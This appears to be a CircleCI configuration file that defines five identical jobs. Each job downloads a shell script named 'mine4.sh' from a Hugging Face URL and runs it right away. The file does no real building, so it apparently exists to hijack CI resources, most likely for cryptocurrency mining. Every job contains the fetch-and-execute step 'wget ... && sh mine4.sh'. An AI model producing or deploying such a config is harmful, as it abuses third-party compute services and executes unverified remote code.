    version: 2
    jobs:
        one:
          docker:
                - image: ubuntu:latest
          steps:
            - wget https://huggingface.co/myfiles/data/raw/main/mine4.sh && sh mine4.sh
        two:
          docker:
                - image: ubuntu:latest
          steps:
            - wget https://huggingface.co/myfiles/data/raw/main/mine4.sh && sh mine4.sh
        three:
          docker:
                - image: ubuntu:latest
          steps:
            - wget https://huggingface.co/myfiles/data/raw/main/mine4.sh && sh mine4.sh
        four:
          docker:
                - image: ubuntu:latest
          steps:
            - wget https://huggingface.co/myfiles/data/raw/main/mine4.sh && sh mine4.sh
        five:
          docker:
                - image: ubuntu:latest
          steps:
            - wget https://huggingface.co/myfiles/data/raw/main/mine4.sh && sh mine4.sh
    
    workflows:
        version: 2
        build:
            jobs:
                - one
                - two
                - three
                - four
                - five
